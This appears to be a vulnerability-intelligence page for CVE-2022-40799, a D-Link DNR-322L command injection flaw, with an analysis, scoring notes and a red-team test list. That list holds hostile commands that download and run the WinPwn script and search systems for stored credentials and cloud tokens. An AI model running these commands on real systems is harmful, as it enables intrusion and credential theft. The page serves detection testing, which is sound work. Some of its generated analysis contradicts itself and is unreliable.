CVE-2022-40799
Overview
This vulnerability is a command injection flaw rooted in improper validation of input parameters within the 'Backup Config' functionality of D-Link DNR-322L firmware versions up to 2.60B15. The affected component fails to sanitize user-supplied data before executing system-level commands, allowing manipulation of OS commands through authenticated access to the backup configuration interface.
Vulnerability Description
Data Integrity Failure in 'Backup Config' in D-Link DNR-322L <= 2.60B15 allows an authenticated attacker to execute OS level commands on the device.
Impact
An attacker with valid credentials can execute arbitrary operating system commands on the affected device, leading to full control over the system. This enables unauthorized data access, modification, or disruption of device functionality. The prerequisite is possession of a low-privileged authenticated account, which can be leveraged to escalate privileges and compromise the device, potentially impacting network security and availability.
Solution
Upgrade the D-Link DNR-322L firmware to a version later than 2.60B15 as recommended by the vendor. Refer to the advisory linked at https://gitlab.com/lu-ka/cve-2022-40799 for detailed patch instructions and verification steps. No specific workaround is documented; thus, applying the official firmware update is the primary remediation measure.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the D-Link DNR-322L device arises from a critical data integrity failure within its 'Backup Config' functionality. This flaw allows an authenticated attacker to execute operating system-level commands on the device, potentially leading to unauthorized access and control. The root cause of this vulnerability lies in improper validation of user inputs when handling configuration backups. Attackers can exploit this weakness by crafting malicious requests that manipulate the backup process, thereby executing arbitrary commands on the underlying operating system. This type of vulnerability is particularly concerning as it bypasses traditional authentication mechanisms, allowing attackers with valid credentials to escalate their privileges significantly.
Exploitation of this vulnerability can occur through various attack vectors. An authenticated user, who may have legitimate access to the device, could leverage this flaw to execute commands that compromise the device's integrity and confidentiality. For instance, an attacker could gain access to sensitive information stored on the device, alter configurations, or even deploy malware. Scenarios may include an insider threat where a disgruntled employee exploits their access or an external attacker who has obtained credentials through phishing or other means. The ability to execute OS-level commands opens the door to a wide range of malicious activities, including data exfiltration, service disruption, and further lateral movement within the network.
The real-world impact of this vulnerability is significant, particularly for organizations relying on the DNR-322L for surveillance and data management. A successful exploitation could lead to unauthorized access to video feeds, tampering with recorded footage, or even the complete shutdown of the surveillance system. The business risks associated with such an incident include reputational damage, loss of customer trust, regulatory penalties, and potential financial losses due to operational disruptions. Additionally, the compromised device could serve as a foothold for attackers to infiltrate other systems within the network, amplifying the overall risk to the organization.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the firmware of the DNR-322L is crucial, as manufacturers often release patches to address known vulnerabilities. Organizations should also conduct routine security assessments and penetration testing to identify potential weaknesses in their network devices. Monitoring logs for unusual activity and implementing strict access controls can help detect unauthorized attempts to exploit the vulnerability. Furthermore, educating users about secure credential management and the risks associated with insider threats can reduce the likelihood of exploitation.
In conclusion, the data integrity failure in the D-Link DNR-322L presents a serious threat to the security of devices and the networks they operate within. The ability for an authenticated attacker to execute OS-level commands poses significant risks that can lead to severe consequences for organizations. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against such vulnerabilities and enhance their overall cybersecurity posture.
Recent updates to the CVE-2022-40799 vulnerability reveal a significant increase in its Exploit Prediction Scoring System (EPSS) value, rising by over 45% to 0.5389. This shift places the vulnerability near the top percentile of predicted exploitation likelihood, indicating heightened interest or potential targeting in the threat landscape. Although no new exploit techniques or ransomware associations have been identified, the elevated EPSS score suggests that threat actors may be increasingly considering this vulnerability for operational use. For defenders, this change underscores the need for heightened vigilance around D-Link DNR-322L devices, as the risk of exploitation has grown appreciably. The stable trend in recent days implies that this is not a transient spike but a sustained elevation in risk. Consequently, the overall threat level for this vulnerability should be reassessed upward, reflecting its increased prominence as a viable attack vector within authenticated environments.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dnr-322l Firmware | All |
cpe:2.3:o:dlink:dnr-322l_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-40799 |
| gitlab.com |
GitHub CVE
|
https://gitlab.com/lu-ka/cve-2022-40799 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-40799 |
| dlink.com |
NVD API
Product
|
https://www.dlink.com/uk/en/products/dnr-322l-cloud-network-video-recorder |